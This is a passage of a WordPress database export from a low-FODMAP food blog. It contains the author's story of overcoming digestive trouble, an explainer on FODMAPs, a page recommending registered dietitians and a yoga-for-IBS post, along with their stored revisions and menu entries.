I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I initially studied and later meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures, food and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn, who are my fabulous food critics. They will tell me honestly if what I cook is good or bad and love sampling my food, especially the deserts and treats.

\n\n\n\n
\"\"
\n\n\n\n


Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

If you\'d like further help and advice I\'ve published a book, \'Tummy Revolution 21, Gut Health Made Simple\' . It\'s a 21 day plan to help you get your tummy back on track. It contains, weekly meal plans, shopping lists 50+ recipes, Youga exercises and much, much more. It\'s your ultimate guide to taming your tummy and to getting your health back on track. You can read more about it here

\n\n\n\n
\"\"
\n\n\n\n


There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes and tips!!
Thank you checking in and hope you stay for a while.
xoxo
Sara 

\n\n\n\n
\"\"/
\n\n\n\n


\n','My Story','','inherit','closed','closed','','4863-autosave-v1','','','2020-04-22 14:47:40','2020-04-22 14:47:40','',4863,'http://tummyrevolution.com/4863-autosave-v1/',0,'revision','',0),(5340,1,'2020-04-22 22:41:04','2020-04-22 22:41:04','','BLOG','','publish','closed','closed','','blog-5','','','2020-04-22 22:42:24','2020-04-22 22:42:24','',0,'http://tummyrevolution.com/?p=5340',5,'nav_menu_item','',0),(5341,1,'2020-04-22 22:41:04','2020-04-22 22:41:04',' ','','','publish','closed','closed','','5341','','','2020-04-22 22:42:24','2020-04-22 22:42:24','',0,'http://tummyrevolution.com/?p=5341',6,'nav_menu_item','',0),(5342,1,'2020-04-22 22:41:06','2020-04-22 22:41:06',' ','','','publish','closed','closed','','5342','','','2020-04-22 22:42:24','2020-04-22 22:42:24','',0,'http://tummyrevolution.com/?p=5342',7,'nav_menu_item','',0),(5343,1,'2020-04-22 22:41:06','2020-04-22 22:41:06','','RECIPES','','publish','closed','closed','','recipes','','','2020-04-22 22:42:24','2020-04-22 22:42:24','',0,'http://tummyrevolution.com/?p=5343',4,'nav_menu_item','',0),(5344,1,'2020-04-22 22:41:03','2020-04-22 22:41:03','','ABOUT','','publish','closed','closed','','about-3','','','2020-04-22 22:42:24','2020-04-22 22:42:24','',0,'http://tummyrevolution.com/?p=5344',3,'nav_menu_item','',0),(5345,1,'2020-04-22 22:41:59','2020-04-22 22:41:59',' ','','','publish','closed','closed','','5345','','','2020-04-22 22:42:24','2020-04-22 22:42:24','',0,'http://tummyrevolution.com/?p=5345',1,'nav_menu_item','',0),(5346,1,'2020-04-22 22:41:59','2020-04-22 22:41:59',' ','','','publish','closed','closed','','5346','','','2020-04-22 22:42:24','2020-04-22 22:42:24','',0,'http://tummyrevolution.com/?p=5346',2,'nav_menu_item','',0),(5348,1,'2020-04-23 08:51:56','2020-04-23 08:51:56','\n
\"\"/
\n\n\n\n

Our gut health play a much more important role to our wellbeing than many think.  When our guts are not working well, the whole body and mind is affected. 

\n\n\n\n

Doctors have been able to diagnose digestive disorders for years but have not been able to provide much in terms of a cure.  It’s only in recent years, that ground breaking research has proven that one solution, lies in the food we eat!

\n\n\n\n

Research conducted by Monash University, in Melbourne Australia, in the early 2000\'s, indicated that certain small carbohydrates in our food were connected to symptoms associated with digestive disorders, such as IBS. These carbohydrates can be divided into groups and named FODMAP’s, which is an acronym for:

\n\n\n\n

Fermentable, Oligosaccharides, Disaccharides, Monosaccharides and Polyols.
It might sound complicated but they are simply fermentable carbohydrates found naturally in the foods we eat.

\n\n\n\n

These carbohydrates (FODMAPs) are not absorbed properly in the small intestine. So when they reach the large intestine the billions of bacteria that naturally line the gut start fermenting the FODMAPs. All of this is perfectly natural and most people don’t have trouble with the amounts of FODMAPs encountered in a typical diet. However, people with a sensitive or damaged gut seem to have a lower tolerance for some of these FODMAPs and the fermentation process results in excessive gas production which causes the familiar symptoms of wind, bloating and discomfort. Also, an osmotic effect occurs where the large intestine either looses or retains too much water. This can cause the symptoms of loose stools or diarrhoea and in other sufferers, constipation. When you increase your intake of FODMAPs your symptoms will also increase.

\n\n\n\n
\"\"/
\n\n\n\n

The research showed that individuals with IBS felt better when they minimised FODMAP’s in their diet; as a result, the low-FODMAP diet was developed.  The low FODMAP diet is not only limited to IBS sufferers.  It has also been shown to improve gut symptoms in people with gluten sensitivity, intestinal inflammation and inflammatory bowel disease. It is now recognised, worldwide, as the number one treatment for IBS and related gastric problems.

\n\n\n\n

The good news is that the low-FODMAP diet is a temporary diet and not a diet for life. It is a method of finding out what triggers your digestive problems so that you can alter and customise your diet according to your own needs. The likelihood is that only a few FODMAPs cause you problems, rather than all.

\n','What is the low FODMAP diet?','','inherit','closed','closed','','4898-revision-v1','','','2020-04-23 08:51:56','2020-04-23 08:51:56','',4898,'http://tummyrevolution.com/4898-revision-v1/',0,'revision','',0),(5350,1,'2020-04-23 09:08:37','2020-04-23 09:08:37','Because the low-FODMAP diet is a medical diet it is always recommend that you work with a FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. If you, for example, have other food allergies or underlying issues, a dietitian can help you work out if the low FODMAP diet is right for you and what the right approach is.\n\n\n\nI work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.\n\n\n\nAs a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. If you have questions or would like to set up an appointment/Skype call, you can find more information about Debra and her FODMAP Consultancy by visiting her website  https://www.fodmapconsultancy.com\n\n\n
\"\"
\n\n\nIf you\'re looking for a UK dietitian near you then the British Dietetic Association has a great search tool HERE where you can search for registered dietitian in your area.\n\nIn the US \'The Academy of Nutrition and Dietetics\' has a similar search facility on their website, which you can find HERE\n\nDietitians of Canada has a dietitian search facility HERE\n\nAnd Dietitians Association of Australia have a search facility to find an accredited practising dietitian HERE','Working with a Dietitian','','publish','open','open','','working-with-a-dietitian','','','2020-04-23 09:08:39','2020-04-23 09:08:39','',0,'http://tummyrevolution.com/?p=5350',0,'post','',0),(5351,1,'2020-04-23 09:08:37','2020-04-23 09:08:37','Because the low-FODMAP diet is a medical diet it is always recommend that you work with a FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. If you, for example, have other food allergies or underlying issues, a dietitian can help you work out if the low FODMAP diet is right for you and what the right approach is.\n\n\n\nI work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.\n\n\n\nAs a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. If you have questions or would like to set up an appointment/Skype call, you can find more information about Debra and her FODMAP Consultancy by visiting her website  https://www.fodmapconsultancy.com\n\n\n
\"\"
\n\n\nIf you\'re looking for a UK dietitian near you then the British Dietetic Association has a great search tool HERE where you can search for registered dietitian in your area.\n\nIn the US \'The Academy of Nutrition and Dietetics\' has a similar search facility on their website, which you can find HERE\n\nDietitians of Canada has a dietitian search facility HERE\n\nAnd Dietitians Association of Australia have a search facility to find an accredited practising dietitian HERE','Working with a Dietitian','','inherit','closed','closed','','5350-revision-v1','','','2020-04-23 09:08:37','2020-04-23 09:08:37','',5350,'http://tummyrevolution.com/5350-revision-v1/',0,'revision','',0),(5352,1,'2020-04-23 09:18:37','2020-04-23 09:18:37','\n
\"This
\n\n\n\n

Our gut health play a much more important role to our wellbeing than many think.  When our guts are not working well, the whole body and mind is affected. 

\n\n\n\n

Doctors have been able to diagnose digestive disorders for years but have not been able to provide much in terms of a cure.  It’s only in recent years, that ground breaking research has proven that one solution, lies in the food we eat!

\n\n\n\n

Research conducted by Monash University, in Melbourne Australia, in the early 2000\'s, indicated that certain small carbohydrates in our food were connected to symptoms associated with digestive disorders, such as IBS. These carbohydrates can be divided into groups and named FODMAP’s, which is an acronym for:

\n\n\n\n

Fermentable, Oligosaccharides, Disaccharides, Monosaccharides and Polyols.
It might sound complicated but they are simply fermentable carbohydrates found naturally in the foods we eat.

\n\n\n\n

These carbohydrates (FODMAPs) are not absorbed properly in the small intestine. So when they reach the large intestine the billions of bacteria that naturally line the gut start fermenting the FODMAPs. All of this is perfectly natural and most people don’t have trouble with the amounts of FODMAPs encountered in a typical diet. However, people with a sensitive or damaged gut seem to have a lower tolerance for some of these FODMAPs and the fermentation process results in excessive gas production which causes the familiar symptoms of wind, bloating and discomfort. Also, an osmotic effect occurs where the large intestine either looses or retains too much water. This can cause the symptoms of loose stools or diarrhoea and in other sufferers, constipation. When you increase your intake of FODMAPs your symptoms will also increase.

\n\n\n\n
\"This
\n\n\n\n

The research showed that individuals with IBS felt better when they minimised FODMAP’s in their diet; as a result, the low-FODMAP diet was developed.  The low FODMAP diet is not only limited to IBS sufferers.  It has also been shown to improve gut symptoms in people with gluten sensitivity, intestinal inflammation and inflammatory bowel disease. It is now recognised, worldwide, as the number one treatment for IBS and related gastric problems.

\n\n\n\n

The good news is that the low-FODMAP diet is a temporary diet and not a diet for life. It is a method of finding out what triggers your digestive problems so that you can alter and customise your diet according to your own needs. The likelihood is that only a few FODMAPs cause you problems, rather than all.

\n','What is the low FODMAP diet','','publish','open','open','','what-is-the-low-fodmap-diet','','','2020-04-23 22:59:39','2020-04-23 22:59:39','',0,'http://tummyrevolution.com/?p=5352',0,'post','',0),(5353,1,'2020-04-23 09:18:37','2020-04-23 09:18:37','\n
\"This
\n\n\n\n

Our gut health play a much more important role to our wellbeing than many think.  When our guts are not working well, the whole body and mind is affected. 

\n\n\n\n

Doctors have been able to diagnose digestive disorders for years but have not been able to provide much in terms of a cure.  It’s only in recent years, that ground breaking research has proven that one solution, lies in the food we eat!

\n\n\n\n

Research conducted by Monash University, in Melbourne Australia, in the early 2000\'s, indicated that certain small carbohydrates in our food were connected to symptoms associated with digestive disorders, such as IBS. These carbohydrates can be divided into groups and named FODMAP’s, which is an acronym for:

\n\n\n\n

Fermentable, Oligosaccharides, Disaccharides, Monosaccharides and Polyols.
It might sound complicated but they are simply fermentable carbohydrates found naturally in the foods we eat.

\n\n\n\n

These carbohydrates (FODMAPs) are not absorbed properly in the small intestine. So when they reach the large intestine the billions of bacteria that naturally line the gut start fermenting the FODMAPs. All of this is perfectly natural and most people don’t have trouble with the amounts of FODMAPs encountered in a typical diet. However, people with a sensitive or damaged gut seem to have a lower tolerance for some of these FODMAPs and the fermentation process results in excessive gas production which causes the familiar symptoms of wind, bloating and discomfort. Also, an osmotic effect occurs where the large intestine either looses or retains too much water. This can cause the symptoms of loose stools or diarrhoea and in other sufferers, constipation. When you increase your intake of FODMAPs your symptoms will also increase.

\n\n\n\n
\"This
\n\n\n\n

The research showed that individuals with IBS felt better when they minimised FODMAP’s in their diet; as a result, the low-FODMAP diet was developed.  The low FODMAP diet is not only limited to IBS sufferers.  It has also been shown to improve gut symptoms in people with gluten sensitivity, intestinal inflammation and inflammatory bowel disease. It is now recognised, worldwide, as the number one treatment for IBS and related gastric problems.

\n\n\n\n

The good news is that the low-FODMAP diet is a temporary diet and not a diet for life. It is a method of finding out what triggers your digestive problems so that you can alter and customise your diet according to your own needs. The likelihood is that only a few FODMAPs cause you problems, rather than all.

\n','What is the low FODMAP diet','','inherit','closed','closed','','5352-revision-v1','','','2020-04-23 09:18:37','2020-04-23 09:18:37','',5352,'http://tummyrevolution.com/5352-revision-v1/',0,'revision','',0),(5354,1,'2020-04-21 13:20:00','2020-04-21 13:20:00','

Exercise can be of great benefits if you\'re suffering with IBS. Yoga can be a particularly good choice of exercise, because it can help lower your stress levels and doesn\'t involve too much jumping around for your gut. Some poses can help relieve certain symptoms of IBS like gas and bloating.

\n

KERRY MORGAN - YOGA INSTRUCTOR
We are really proud to work with yoga teacher Kerry Morgan. She\'s an incredibly talented, ambitious and kind hearted person that brings us real inspiration. Kerry has helped us develop a number of Tummy Friendly sequences to relieve stress and aid relaxation which you can find in the video below. This sequence is especially developed for evening time to help you relax and to aid a better nights sleep. We hope you enjoy it

\n\n\n
\nhttps://www.youtube.com/watch?v=bjpaT236KP0&t=4s\n
\n\n\n\n

Please find some more information about Kerry Morgan below and a great beach Yoga video.

\n\n\n\n
\"\"
\n\n\n\n

Kerry teaches mindfully, with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul.Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment stemming from her desire to use yoga as a tool to heal and strengthen the body and mind. Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.You can find out more about Kerry and the yoga she teaches here
You must also check out Kerry\'s beach yoga video.It really makes us what to pick up our yoga mats and head for the beach!
HTMLPreview

\n','Yoga for a troubling tummy','','publish','open','open','','yoga-for-a-troubling-tummy','','','2020-04-23 13:34:07','2020-04-23 13:34:07','',0,'http://tummyrevolution.com/?p=5354',0,'post','',0),(5355,1,'2020-04-23 13:16:44','2020-04-23 13:16:44','','Peach-Photo-Women-Quote-Instagram-Post-2','','inherit','open','closed','','peach-photo-women-quote-instagram-post-2','','','2020-04-23 13:16:44','2020-04-23 13:16:44','',5354,'http://tummyrevolution.com/wp-content/uploads/2020/04/Peach-Photo-Women-Quote-Instagram-Post-2.jpg',0,'attachment','image/jpeg',0),(5356,1,'2020-04-23 13:20:27','2020-04-23 13:20:27','

Exercise can be of great benefits if you\'re suffering with IBS. Yoga can be a particularly good choice of exercise, because it can help lower your stress levels and doesn\'t involve too much jumping around for your gut. Some poses can help relieve certain symptoms of IBS like gas and bloating.

KERRY MORGAN - YOGA INSTRUCTOR
We are really proud to work with yoga teacher Kerry Morgan. She\'s an incredibly talented, ambitious and kind hearted person that brings us real inspiration. Kerry has helped us develop a number of Tummy Friendly sequences to relieve stress and aid relaxation which you can find in the video below. This sequence is especially developed for evening time to help you relax and to aid a better nights sleep. We hope you enjoy it

\n\n\n
\nhttps://www.youtube.com/watch?v=bjpaT236KP0&t=4s\n
\n\n\n\n

Please find some more information about Kerry Morgan below and a great beach Yoga video.

\n\n\n\n
\"\"
\n\n\n\n

Kerry teaches mindfully, with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul.Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment stemming from her desire to use yoga as a tool to heal and strengthen the body and mind. Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.You can find out more about Kerry and the yoga she teaches here
You must also check out Kerry\'s beach yoga video.It really makes us what to pick up our yoga mats and head for the beach!
HTMLPreview

\n','Yoga for a troubling tummy','','inherit','closed','closed','','5354-revision-v1','','','2020-04-23 13:20:27','2020-04-23 13:20:27','',5354,'http://tummyrevolution.com/5354-revision-v1/',0,'revision','',0),(5357,1,'2020-04-23 13:22:53','2020-04-23 13:22:53','','_MG_0466','','inherit','open','closed','','_mg_0466','','','2020-04-23 13:22:53','2020-04-23 13:22:53','',5354,'http://tummyrevolution.com/wp-content/uploads/2020/04/MG_0466.jpg',0,'attachment','image/jpeg',0),(5358,1,'2020-04-23 13:34:05','2020-04-23 13:34:05','

Exercise can be of great benefits if you\'re suffering with IBS. Yoga can be a particularly good choice of exercise, because it can help lower your stress levels and doesn\'t involve too much jumping around for your gut. Some poses can help relieve certain symptoms of IBS like gas and bloating.

\n

KERRY MORGAN - YOGA INSTRUCTOR
We are really proud to work with yoga teacher Kerry Morgan. She\'s an incredibly talented, ambitious and kind hearted person that brings us real inspiration. Kerry has helped us develop a number of Tummy Friendly sequences to relieve stress and aid relaxation which you can find in the video below. This sequence is especially developed for evening time to help you relax and to aid a better nights sleep. We hope you enjoy it

\n\n\n
\nhttps://www.youtube.com/watch?v=bjpaT236KP0&t=4s\n
\n\n\n\n

Please find some more information about Kerry Morgan below and a great beach Yoga video.

\n\n\n\n
\"\"
\n\n\n\n

Kerry teaches mindfully, with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul.Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment stemming from her desire to use yoga as a tool to heal and strengthen the body and mind. Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.You can find out more about Kerry and the yoga she teaches here
You must also check out Kerry\'s beach yoga video.It really makes us what to pick up our yoga mats and head for the beach!
HTMLPreview

\n','Yoga for a troubling tummy','','inherit','closed','closed','','5354-revision-v1','','','2020-04-23 13:34:05','2020-04-23 13:34:05','',5354,'http://tummyrevolution.com/5354-revision-v1/',0,'revision','',0),(5359,1,'2020-04-23 23:01:42','2020-04-23 23:01:42','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:01:42','2020-04-23 23:01:42','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5360,1,'2020-04-23 23:03:37','2020-04-23 23:03:37','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587682969727-06892515-f977-5\" taxonomies=\"92\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:03:37','2020-04-23 23:03:37','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5361,1,'2020-04-23 23:04:29','2020-04-23 23:04:29','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:04:29','2020-04-23 23:04:29','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5364,1,'2020-04-23 23:12:02','2020-04-23 23:12:02','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:12:02','2020-04-23 23:12:02','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5365,1,'2020-04-23 23:15:52','2020-04-23 23:15:52','','articles and news','','inherit','closed','closed','','5282-revision-v1','','','2020-04-23 23:15:52','2020-04-23 23:15:52','',5282,'http://tummyrevolution.com/5282-revision-v1/',0,'revision','',0),(5366,1,'2020-04-23 23:16:49','2020-04-23 23:16:49','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDExJTJDaHR0cHMlM0ElMkYlMkZ3d3cua29iby5jb20lMkZ3dyUyRmVuJTJGZWJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGU=\"][/vc_column][/vc_row][vc_row][vc_column][contact-form-7 id=\"4398\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-23 23:16:49','2020-04-23 23:16:49','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5367,1,'2020-04-23 23:19:16','2020-04-23 23:19:16','[vc_row][vc_column][vc_gallery type=\"flexslider_slide\" interval=\"3\" images=\"5214,5217,5220,5223\" img_size=\"medium\" onclick=\"custom_link\" custom_links_target=\"_blank\" 